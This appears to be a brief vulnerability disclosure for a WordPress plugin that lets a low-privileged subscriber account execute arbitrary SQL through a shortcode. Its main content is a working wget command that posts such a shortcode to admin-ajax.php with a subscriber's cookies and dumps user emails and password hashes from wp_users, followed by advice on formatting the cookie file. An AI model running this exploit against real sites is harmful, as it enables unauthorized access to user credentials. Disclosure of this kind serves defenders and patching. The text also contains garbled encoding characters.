Itβs not an SQL injection actually, itβs just executing SQL with an account as low-privileged as a subscriber. The plugin description says it all. This (https://blog.sucuri.net/2016/08/sql-injection-vulnerability-ninja-forms.html) great article will help understanding how to exploit shortcodes and why this works. Vulnerabilities: Execute whatever SQL you want to execute. Found by: Paul Dannewitz Other vulnerabilities I submitted to wpvulndb: https://wpvulndb.com/search?utf8=β&text;=Paul+Dannewitz
wget --load-cookies cookie_file_with_cookies_of_just_a_subscriber_account.txt --post-data="action=parse-media-shortcode&shortcode=[sql]SELECT user_email, user_pass FROM wp_users[/sql]" wordpress.app/wp-admin/admin-ajax.php
Make sure the cookie file has the right format (Netscape), useful converter: http://crdx.org/misc/cookies/